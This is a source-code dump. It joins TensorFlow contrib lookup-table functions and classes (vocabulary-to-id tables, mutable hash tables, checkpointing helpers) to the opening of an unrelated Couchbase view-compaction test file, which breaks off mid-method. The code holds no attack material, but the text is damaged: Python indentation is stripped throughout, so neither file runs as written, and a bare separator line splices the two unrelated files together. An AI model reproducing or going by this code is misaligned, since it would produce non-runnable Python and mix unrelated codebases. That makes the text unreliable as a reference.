name=None):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a vocabulary file specified in
`vocabulary_file`, where the whole line is the key and the zero-based line
number is the ID.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is `[vocabulary size, vocabulary size + num_oov_buckets]`.
The underlying table must be initialized by calling
  `tf.tables_initializer().run()` or `table.init.run()` once.
Sample Usages:
If we have a vocabulary file "test.txt" with the following content:
```
emerson
lake
palmer
```
```python
features = tf.constant(["emerson", "lake", "and", "palmer"])
table = tf.contrib.lookup.index_table_from_file(
vocabulary_file="test.txt", num_oov_buckets=1)
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 3, 2] # where 3 is the out-of-vocabulary bucket
```
Args:
vocabulary_file: The vocabulary filename.
num_oov_buckets: The number of out-of-vocabulary buckets.
vocab_size: Number of the elements in the vocabulary, if known.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
      assignment of out-of-vocabulary buckets.
key_dtype: The `key` data type.
name: A name for this op (optional).
Returns:
The lookup table to map a `key_dtype` `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `vocabulary_file` is not set.
ValueError: If `num_oov_buckets` is negative or `vocab_size` is not greater
than zero.
"""
if not vocabulary_file:
raise ValueError("vocabulary_file must be specified.")
if num_oov_buckets < 0:
raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
% num_oov_buckets)
if vocab_size is not None and vocab_size < 1:
raise ValueError("vocab_size must be greater than 0, got %d." % vocab_size)
if (not key_dtype.is_integer) and (dtypes.string != key_dtype.base_dtype):
raise TypeError("Only integer and string keys are supported.")
with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
table = None
shared_name = ""
with ops.name_scope(None, "hash_table") as hash_table_scope:
if vocab_size:
# Keep the shared_name:
# <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
TextFileIndex.WHOLE_LINE,
TextFileIndex.LINE_NUMBER)
else:
# Keep the shared_name
# <table_type>_<filename>_<key_index>_<value_index>
shared_name = "hash_table_%s_%s_%s" % (vocabulary_file,
TextFileIndex.WHOLE_LINE,
TextFileIndex.LINE_NUMBER)
init = TextFileIdTableInitializer(
vocabulary_file, vocab_size=vocab_size,
key_dtype=dtypes.int64 if key_dtype.is_integer else key_dtype,
name="table_init")
table = HashTable(
init, default_value, shared_name=shared_name, name=hash_table_scope)
if num_oov_buckets:
table = IdTableWithHashBuckets(
table,
num_oov_buckets=num_oov_buckets,
hasher_spec=hasher_spec,
name=feat_to_id_scope,
key_dtype=key_dtype)
return table
@deprecated("2017-04-10", "Use `index_table_from_tensor`.")
def string_to_index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
with ops.name_scope(name, "string_to_index") as scope:
mapping = ops.convert_to_tensor(mapping)
if dtypes.string != mapping.dtype.base_dtype:
raise ValueError("string_to_index_table_from_tensor requires string.")
return index_table_from_tensor(
mapping, num_oov_buckets, default_value, hasher_spec, name=scope)
def index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
dtype=dtypes.string,
name=None):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a string `mapping` 1-D tensor
where each element is a key and corresponding index within the tensor is the
value.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is `[mapping size, mapping size + num_oov_buckets - 1]`.
The underlying table must be initialized by calling
`tf.tables_initializer().run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_strings = tf.constant(["emerson", "lake", "palmer"])
table = tf.contrib.lookup.index_table_from_tensor(
mapping=mapping_strings, num_oov_buckets=1, default_value=-1)
features = tf.constant(["emerson", "lake", "and", "palmer"])
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 3, 2]  # where 3 is the out-of-vocabulary bucket
```
Args:
mapping: A 1-D `Tensor` that specifies the mapping of keys to indices. The
type of this object must be castable to `dtype`.
num_oov_buckets: The number of out-of-vocabulary buckets.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignment of out-of-vocabulary buckets.
dtype: The type of values passed to `lookup`. Only string and integers are
supported.
name: A name for this op (optional).
Returns:
The lookup table to map an input `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `mapping` is invalid.
ValueError: If `num_oov_buckets` is negative.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
if num_oov_buckets < 0:
raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
% num_oov_buckets)
if (not dtype.is_integer) and (dtypes.string != dtype.base_dtype):
raise TypeError("Only integer and string keys are supported.")
with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
keys = ops.convert_to_tensor(mapping)
if keys.dtype.is_integer != dtype.is_integer:
raise ValueError("Expected %s, got %s." % (
"integer" if dtype.is_integer else "non-integer", keys.dtype))
if (not dtype.is_integer) and (keys.dtype.base_dtype != dtype):
raise ValueError("Expected %s, got %s." % (dtype, keys.dtype))
num_elements = array_ops.size(keys)
values = math_ops.to_int64(math_ops.range(num_elements))
shared_name = ""
with ops.name_scope(None, "hash_table") as hash_table_scope:
table_keys = math_ops.to_int64(keys) if keys.dtype.is_integer else keys
init = KeyValueTensorInitializer(
table_keys, values, table_keys.dtype.base_dtype, dtypes.int64,
name="table_init")
table = HashTable(
init, default_value, shared_name=shared_name, name=hash_table_scope)
if num_oov_buckets:
table = IdTableWithHashBuckets(
table,
num_oov_buckets=num_oov_buckets,
hasher_spec=hasher_spec,
name=feat_to_id_scope,
key_dtype=dtype)
return table
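# Illustrative sketch added for exposition (not part of the original API): a plain
# Python model of the id assignment described in the docstring above. In-vocabulary
# keys receive their position in `mapping`; out-of-vocabulary keys are hashed into
# the bucket range [len(mapping), len(mapping) + num_oov_buckets). The real table
# uses the hash function named by `hasher_spec`; Python's built-in hash() below is
# only a stand-in for the sketch.
def _sketch_index_assignment(key, mapping, num_oov_buckets, default_value=-1):
  if key in mapping:
    return list(mapping).index(key)
  if num_oov_buckets > 0:
    return len(mapping) + (hash(key) % num_oov_buckets)
  return default_value
# For example, _sketch_index_assignment("and", ["emerson", "lake", "palmer"], 1)
# returns 3: with a single bucket every out-of-vocabulary key maps to id 3, which is
# the behaviour the samples above illustrate.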
@deprecated(
"2017-01-07", "This op will be removed after the deprecation date. "
"Please switch to index_table_from_tensor and call the lookup "
"method of the returned table.")
def string_to_index(tensor, mapping, default_value=-1, name=None):
"""Maps `tensor` of strings into `int64` indices based on `mapping`.
This operation converts `tensor` of strings into `int64` indices.
The mapping is initialized from a string `mapping` tensor where each element
is a key and corresponding index within the tensor is the value.
Any entry in the input which does not have a corresponding entry in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`.
Elements in `mapping` cannot be duplicated, otherwise the initialization
will throw a FailedPreconditionError.
The underlying table must be initialized by calling
`tf.tables_initializer().run()` once.
For example:
```python
mapping_strings = tf.constant(["emerson", "lake", "palmer"])
feats = tf.constant(["emerson", "lake", "and", "palmer"])
ids = tf.contrib.lookup.string_to_index(
feats, mapping=mapping_strings, default_value=-1)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, -1, 2]
```
Args:
tensor: A 1-D input `Tensor` with the strings to map to indices.
mapping: A 1-D string `Tensor` that specifies the mapping of strings to
indices.
default_value: The `int64` value to use for out-of-vocabulary strings.
Defaults to -1.
name: A name for this op (optional).
Returns:
The mapped indices. It has the same shape and tensor type (dense or sparse)
as `tensor`.
"""
table = index_table_from_tensor(
mapping=mapping, default_value=default_value, name=name)
return table.lookup(tensor)
def index_to_string_table_from_file(vocabulary_file,
vocab_size=None,
default_value="UNK",
name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The table is initialized from a vocabulary file specified in
`vocabulary_file`, where the whole line is the value and the
zero-based line number is the index.
Any input which does not have a corresponding index in the vocabulary file
(an out-of-vocabulary entry) is assigned the `default_value`.
The underlying table must be initialized by calling
`tf.tables_initializer().run()` or `table.init.run()` once.
Sample Usages:
If we have a vocabulary file "test.txt" with the following content:
```
emerson
lake
palmer
```
```python
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_file(
vocabulary_file="test.txt", default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
vocabulary_file: The vocabulary filename.
vocab_size: Number of the elements in the vocabulary, if known.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table mapping `int64` index `Tensors` to their associated string values.
Raises:
ValueError: when `vocabulary_file` is empty.
ValueError: when `vocab_size` is invalid.
"""
if not vocabulary_file:
raise ValueError("vocabulary_file must be specified.")
if vocab_size is not None and vocab_size < 1:
raise ValueError("vocab_size must be greater than 0, got %d." % vocab_size)
with ops.name_scope(name, "index_to_string") as scope:
shared_name = ""
if vocab_size:
# Keep a shared_name
# <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
TextFileIndex.LINE_NUMBER,
TextFileIndex.WHOLE_LINE)
else:
# Keep a shared_name <table_type>_<filename>_<key_index>_<value_index>
shared_name = "hash_table_%s_%s_%s" % (vocabulary_file,
TextFileIndex.LINE_NUMBER,
TextFileIndex.WHOLE_LINE)
init = TextFileStringTableInitializer(
vocabulary_file, vocab_size=vocab_size, name="table_init")
# TODO(yleon): Use a more efficient structure.
return HashTable(init, default_value, shared_name=shared_name, name=scope)
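# Illustrative sketch added for exposition (not part of the original API): builds
# the forward (string -> id) and reverse (id -> string) tables from the same
# vocabulary file to show the symmetry described above -- the whole line is the
# string and the zero-based line number is the id in both directions. It assumes the
# forward builder defined earlier in this module is `index_table_from_file`; the
# file contents and the single OOV bucket are assumptions of the sketch. Run both
# lookups after `tf.tables_initializer().run()`.
def _sketch_vocab_round_trip(vocabulary_file):
  words = ops.convert_to_tensor(["emerson", "lake", "and", "palmer"])
  to_ids = index_table_from_file(vocabulary_file, num_oov_buckets=1)
  to_strings = index_to_string_table_from_file(vocabulary_file,
                                               default_value="UNK")
  ids = to_ids.lookup(words)
  # "and" is out of vocabulary, so its id falls in the OOV bucket and maps back
  # to the reverse table's default_value ("UNK").
  return ids, to_strings.lookup(ids)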
def index_to_string_table_from_tensor(mapping, default_value="UNK", name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The mapping is initialized from a string `mapping` 1-D `Tensor` where
each element is a value and the corresponding index within the tensor is the
key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`.
The underlying table must be initialized by calling
`tf.tables_initializer().run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_string = tf.constant(["emerson", "lake", "palmer"])
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_tensor(
mapping_string, default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table mapping `int64` index `Tensors` to their associated string values.
Raises:
ValueError: when `mapping` is not set.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
with ops.name_scope(name, "index_to_string") as scope:
values = ops.convert_to_tensor(mapping, dtypes.string)
num_elements = array_ops.size(values)
keys = math_ops.to_int64(math_ops.range(num_elements))
shared_name = ""
init = KeyValueTensorInitializer(
keys, values, dtypes.int64, dtypes.string, name="table_init")
# TODO(yleon): Use a more efficient structure.
return HashTable(init, default_value, shared_name=shared_name, name=scope)
@deprecated(
"2017-01-07", "This op will be removed after the deprecation date. "
"Please switch to index_to_string_table_from_tensor and call the lookup "
"method of the returned table.")
def index_to_string(tensor, mapping, default_value="UNK", name=None):
"""Maps `tensor` of indices into string values based on `mapping`.
This operation converts `int64` indices into string values. The mapping is
initialized from a string `mapping` tensor where each element is a value and
the corresponding index within the tensor is the key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`.
The underlying table must be initialized by calling
`tf.tables_initializer().run()` once.
For example:
```python
mapping_string = tf.constant(["emerson", "lake", "palmer"])
indices = tf.constant([1, 5], tf.int64)
values = tf.contrib.lookup.index_to_string(
indices, mapping=mapping_string, default_value="UNKNOWN")
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
tensor: A `int64` `Tensor` with the indices to map to strings.
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The string value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The string values associated with the indices. The resultant dense
feature value tensor has the same shape as the corresponding `indices`.
"""
table = index_to_string_table_from_tensor(
mapping=mapping, default_value=default_value, name=name)
return table.lookup(tensor)
class MutableHashTable(LookupInterface):
"""A generic mutable hash table implementation.
Data can be inserted by calling the insert method. It does not support
initialization via the init method.
Example usage:
```python
table = tf.contrib.lookup.MutableHashTable(key_dtype=tf.string,
value_dtype=tf.int64,
default_value=-1)
table.insert(keys, values)
out = table.lookup(query_keys)
print out.eval()
```
"""
def __init__(self,
key_dtype,
value_dtype,
default_value,
shared_name=None,
name="MutableHashTable",
checkpoint=True):
"""Creates an empty `MutableHashTable` object.
Creates a table, the type of its keys and values are specified by key_dtype
and value_dtype, respectively.
Args:
key_dtype: the type of the key tensors.
value_dtype: the type of the value tensors.
default_value: The value to use if a key is missing in the table.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
checkpoint: if True, the contents of the table are saved to and restored
from checkpoints. If `shared_name` is empty for a checkpointed table, it
is shared using the table node name.
Returns:
A `MutableHashTable` object.
Raises:
ValueError: If checkpoint is True and no name was specified.
"""
self._default_value = ops.convert_to_tensor(default_value,
dtype=value_dtype)
self._value_shape = self._default_value.get_shape()
# The table must be shared if checkpointing is requested for multi-worker
# training to work correctly. Use the node name if no shared_name has been
# explicitly specified.
use_node_name_sharing = checkpoint and shared_name is None
# pylint: disable=protected-access
if self._default_value.get_shape().ndims == 0:
self._table_ref = gen_lookup_ops._mutable_hash_table(
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
key_dtype=key_dtype,
value_dtype=value_dtype,
name=name)
else:
self._table_ref = gen_lookup_ops._mutable_hash_table_of_tensors(
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
key_dtype=key_dtype,
value_dtype=value_dtype,
value_shape=self._default_value.get_shape(),
name=name)
# pylint: enable=protected-access
super(MutableHashTable, self).__init__(key_dtype, value_dtype,
self._table_ref.op.name.split(
"/")[-1])
if checkpoint:
saveable = MutableHashTable._Saveable(self, name)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size(self._table_ref, name=name)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. Can be a tensor of any shape. Must match the
table's key_dtype.
name: A name for the operation (optional).
Returns:
A tensor containing the values in the same shape as `keys` using the
table's value type.
Raises:
TypeError: when `keys` do not match the table data types.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_lookup_table_find" % self._name,
(self._table_ref, keys, self._default_value)) as name:
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find(
self._table_ref, keys, self._default_value, name=name)
values.set_shape(keys.get_shape().concatenate(self._value_shape))
return values
def insert(self, keys, values, name=None):
"""Associates `keys` with `values`.
Args:
keys: Keys to insert. Can be a tensor of any shape. Must match the
table's key type.
values: Values to be associated with keys. Must be a tensor of the same
shape as `keys` and match the table's value type.
name: A name for the operation (optional).
Returns:
The created Operation.
Raises:
TypeError: when `keys` or `values` doesn't match the table data
types.
"""
self.check_table_dtypes(keys.dtype, values.dtype)
with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
[self._table_ref, keys, values]) as name:
# pylint: disable=protected-access
op = gen_lookup_ops._lookup_table_insert(
self._table_ref, keys, values, name=name)
return op
def export(self, name=None):
"""Returns tensors of all keys and values in the table.
Args:
name: A name for the operation (optional).
Returns:
A pair of tensors with the first tensor containing all keys and the
second tensors containing all values in the table.
"""
with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
exported_keys, exported_values = gen_lookup_ops._lookup_table_export(
self._table_ref, self._key_dtype, self._value_dtype, name=name)
exported_values.set_shape(exported_keys.get_shape().concatenate(
self._value_shape))
return exported_keys, exported_values
class _Saveable(BaseSaverBuilder.SaveableObject):
"""SaveableObject implementation for MutableHashTable."""
def __init__(self, table, name):
tensors = table.export()
specs = [
BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
]
# pylint: disable=protected-access
super(MutableHashTable._Saveable, self).__init__(table, specs, name)
def restore(self, restored_tensors, unused_restored_shapes):
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_import(
self.op._table_ref, restored_tensors[0], restored_tensors[1])
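# Illustrative sketch added for exposition (not part of the original API): because
# the constructor above registers a _Saveable in GraphKeys.SAVEABLE_OBJECTS when
# checkpoint=True, a plain tf.train.Saver picks the table's keys and values up
# automatically and re-imports them on restore. The dtypes and sample keys below are
# assumptions of the sketch.
def _sketch_mutable_hash_table_checkpointing():
  table = MutableHashTable(key_dtype=dtypes.string,
                           value_dtype=dtypes.int64,
                           default_value=-1,
                           name="sketch_table")
  insert_op = table.insert(
      ops.convert_to_tensor(["emerson", "lake"]),
      ops.convert_to_tensor([0, 1], dtypes.int64))
  # After running insert_op, tf.train.Saver().save(...) writes "<name>-keys" and
  # "<name>-values" tensors; restoring re-populates the table via _Saveable.restore.
  return table, insert_op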
class MutableDenseHashTable(LookupInterface):
"""A generic mutable hash table implementation using tensors as backing store.
Data can be inserted by calling the insert method. It does not support
initialization via the init method.
It uses "open addressing" with quadratic reprobing to resolve collisions.
Compared to `MutableHashTable` the insert and lookup operations in a
`MutableDenseHashTable` are typically faster, but memory usage can be higher.
However, `MutableDenseHashTable` does not require additional memory for
temporary tensors created during checkpointing and restore operations.
Example usage:
```python
table = tf.contrib.lookup.MutableDenseHashTable(key_dtype=tf.int64,
value_dtype=tf.int64,
default_value=-1,
empty_key=0)
table.insert(keys, values)
out = table.lookup(query_keys)
print out.eval()
```
"""
# TODO(andreasst): consider extracting common code with MutableHashTable into
# a common superclass.
def __init__(self,
key_dtype,
value_dtype,
default_value,
empty_key,
initial_num_buckets=None,
shared_name=None,
name="MutableDenseHashTable",
checkpoint=True):
"""Creates an empty `MutableDenseHashTable` object.
Creates a table, the type of its keys and values are specified by key_dtype
and value_dtype, respectively.
Args:
key_dtype: the type of the key tensors.
value_dtype: the type of the value tensors.
default_value: The value to use if a key is missing in the table.
empty_key: the key to use to represent empty buckets internally. Must not
be used in insert or lookup operations.
initial_num_buckets: the initial number of buckets.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
checkpoint: if True, the contents of the table are saved to and restored
from checkpoints. If `shared_name` is empty for a checkpointed table, it
is shared using the table node name.
Returns:
A `MutableHashTable` object.
Raises:
ValueError: If checkpoint is True and no name was specified.
"""
self._default_value = ops.convert_to_tensor(
default_value, dtype=value_dtype)
self._value_shape = self._default_value.get_shape()
# The table must be shared if checkpointing is requested for multi-worker
# training to work correctly. Use the node name if no shared_name has been
# explicitly specified.
use_node_name_sharing = checkpoint and shared_name is None
empty_key = ops.convert_to_tensor(empty_key, dtype=key_dtype)
# pylint: disable=protected-access
self._table_ref = gen_lookup_ops._mutable_dense_hash_table(
empty_key=empty_key,
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
value_dtype=value_dtype,
value_shape=self._value_shape,
initial_num_buckets=initial_num_buckets,
name=name)
# pylint: enable=protected-access
super(MutableDenseHashTable, self).__init__(
key_dtype, value_dtype, self._table_ref.op.name.split("/")[-1])
if checkpoint:
saveable = MutableDenseHashTable._Saveable(self, name)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size(self._table_ref, name=name)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. Can be a tensor of any shape. Must match the
table's key_dtype.
name: A name for the operation (optional).
Returns:
A tensor containing the values in the same shape as `keys` using the
table's value type.
Raises:
TypeError: when `keys` do not match the table data types.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_lookup_table_find" % self._name,
[self._table_ref, keys]) as name:
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find(
self._table_ref, keys, self._default_value, name=name)
if keys.get_shape().ndims is not None and keys.get_shape().ndims > 0:
values.set_shape(
tensor_shape.TensorShape([keys.get_shape().dims[0]]).concatenate(
self._value_shape))
return values
def insert(self, keys, values, name=None):
"""Associates `keys` with `values`.
Args:
keys: Keys to insert. Can be a tensor of any shape. Must match the
table's key type.
values: Values to be associated with keys. Must be a tensor of the same
shape as `keys` and match the table's value type.
name: A name for the operation (optional).
Returns:
The created Operation.
Raises:
TypeError: when `keys` or `values` doesn't match the table data
types.
"""
self.check_table_dtypes(keys.dtype, values.dtype)
with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
[self._table_ref, keys, values]) as name:
# pylint: disable=protected-access
op = gen_lookup_ops._lookup_table_insert(
self._table_ref, keys, values, name=name)
return op
def export(self, name=None):
"""Returns tensors of all keys and values in the table.
Args:
name: A name for the operation (optional).
Returns:
A pair of tensors with the first tensor containing all keys and the
second tensors containing all values in the table.
"""
with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
[self._table_ref]) as name:
# pylint: disable=protected-access
exported_keys, exported_values = gen_lookup_ops._lookup_table_export(
self._table_ref, self._key_dtype, self._value_dtype, name=name)
exported_values.set_shape(exported_keys.get_shape().concatenate(
self._value_shape))
return exported_keys, exported_values
class _Saveable(BaseSaverBuilder.SaveableObject):
"""SaveableObject implementation for MutableDenseHashTable."""
def __init__(self, table, name):
tensors = table.export()
specs = [
BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
]
# pylint: disable=protected-access
super(MutableDenseHashTable._Saveable, self).__init__(table, specs, name)
def restore(self, restored_tensors, unused_restored_shapes):
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_import(
self.op._table_ref, restored_tensors[0], restored_tensors[1])
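# Illustrative sketch added for exposition (not part of the original API): minimal
# use of the dense table described above. The open-addressing layout needs an
# `empty_key` that never occurs in real data (0 is reserved here, so real keys start
# at 1); the dtypes, keys and bucket count are assumptions of the sketch.
def _sketch_mutable_dense_hash_table():
  table = MutableDenseHashTable(key_dtype=dtypes.int64,
                                value_dtype=dtypes.int64,
                                default_value=-1,
                                empty_key=0,
                                initial_num_buckets=8)
  keys = ops.convert_to_tensor([1, 2, 3], dtypes.int64)
  values = ops.convert_to_tensor([10, 20, 30], dtypes.int64)
  # Run the insert op first, then the lookup; a missing key (e.g. 4) would return
  # the default_value of -1.
  return table, table.insert(keys, values), table.lookup(keys)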
|
py | b41524e291a8f6c5c161b46741bfca94525329ff | import time, json
from threading import Thread, Event
import datetime
from tasks.future import TimeoutError
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import DocumentGenerator
from couchbase_helper.documentgenerator import BlobGenerator
from couchbase_helper.document import DesignDocument, View
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection
from membase.helper.rebalance_helper import RebalanceHelper
from view.viewquerytests import StoppableThread
class CompactionViewTests(BaseTestCase):
def setUp(self):
super(CompactionViewTests, self).setUp()
self.value_size = self.input.param("value_size", 256)
self.fragmentation_value = self.input.param("fragmentation_value", 80)
self.ddocs_num = self.input.param("ddocs_num", 1)
self.view_per_ddoc = self.input.param("view_per_ddoc", 2)
self.use_dev_views = self.input.param("use_dev_views", False)
self.default_map_func = "function (doc) {\n emit(doc._id, doc);\n}"
self.default_view_name = "default_view"
self.default_view = View(self.default_view_name, self.default_map_func, None)
self.ddocs = []
self.gen_load = BlobGenerator('test_view_compaction', 'test_view_compaction-',
self.value_size, end=self.num_items)
self.thread_crashed = Event()
self.thread_stopped = Event()
def tearDown(self):
super(CompactionViewTests, self).tearDown()
"""Trigger Compaction When specified Fragmentation is reached"""
def test_multiply_compaction(self):
# disable auto compaction
self.disable_compaction()
cycles_num = self.input.param("cycles-num", 3)
# create ddoc and add views
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
# load initial documents
self._load_all_buckets(self.master, self.gen_load, "create", 0)
for i in xrange(cycles_num):
for ddoc in self.ddocs:
# start fragmentation monitor
fragmentation_monitor = \
self.cluster.async_monitor_view_fragmentation(self.master,
ddoc.name,
self.fragmentation_value)
# generate load until fragmentation reached
while fragmentation_monitor.state != "FINISHED":
# update docs to create fragmentation
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
# run queries to create indexes
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
for ddoc in self.ddocs:
result = self.cluster.compact_view(self.master, ddoc.name)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
def make_ddocs(self, ddocs_num, views_per_ddoc):
ddoc_name = "compaction_ddoc"
view_name = "compaction_view"
for i in xrange(ddocs_num):
views = self.make_default_views(view_name, views_per_ddoc, different_map=True)
self.ddocs.append(DesignDocument(ddoc_name + str(i), views))
def create_ddocs(self, ddocs=None, bucket=None):
bucket_views = bucket or self.buckets[0]
ddocs_to_create = ddocs or self.ddocs
for ddoc in ddocs_to_create:
if not ddoc.views:
self.cluster.create_view(self.master, ddoc.name, [], bucket=bucket_views)
for view in ddoc.views:
self.cluster.create_view(self.master, ddoc.name, view, bucket=bucket_views)
'''
Test changing the cluster RAM quota during indexing.
http://www.couchbase.com/issues/browse/CBQE-1649
'''
def test_compaction_with_cluster_ramquota_change(self):
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
gen_load = BlobGenerator('test_view_compaction',
'test_view_compaction-',
self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", 0)
for ddoc in self.ddocs:
fragmentation_monitor = \
self.cluster.async_monitor_view_fragmentation(self.master,
ddoc.name,
self.fragmentation_value)
while fragmentation_monitor.state != "FINISHED":
self._load_all_buckets(self.master, gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
compaction_tasks = []
for ddoc in self.ddocs:
compaction_tasks.append(self.cluster.async_compact_view(self.master, ddoc.name))
remote = RemoteMachineShellConnection(self.master)
cli_command = "setting-cluster"
options = "--cluster-ramsize=%s" % (self.quota + 10)
output, error = remote.execute_couchbase_cli(cli_command=cli_command, options=options, cluster_host="localhost",
user=self.master.rest_username, password=self.master.rest_password)
self.assertTrue('\n'.join(output).find('SUCCESS') != -1, 'ram wasn\'t changed')
self.log.info('Quota was changed')
for task in compaction_tasks:
task.result()
def test_views_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
for ddoc in self.ddocs:
fragmentation_monitor = \
self.cluster.async_monitor_db_fragmentation(self.master, self.fragmentation_value, self.default_bucket_name, True)
while fragmentation_monitor.state != "FINISHED":
self._load_all_buckets(self.master, self.gen_load, "update", 0)
for view in ddoc.views:
self.cluster.query_view(self.master, ddoc.name, view.name, {})
fragmentation_monitor.result()
compaction_task = self.cluster.async_monitor_compact_view(self.master, ddoc.name, frag_value=self.fragmentation_value)
compaction_task.result()
def rebalance_in_with_auto_ddoc_compaction(self):
rest = RestConnection(self.master)
self.set_auto_compaction(rest, viewFragmntThresholdPercentage=self.fragmentation_value)
self.make_ddocs(self.ddocs_num, self.view_per_ddoc)
self.create_ddocs()
self._load_all_buckets(self.master, self.gen_load, "create", 0)
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
compaction_tasks = []
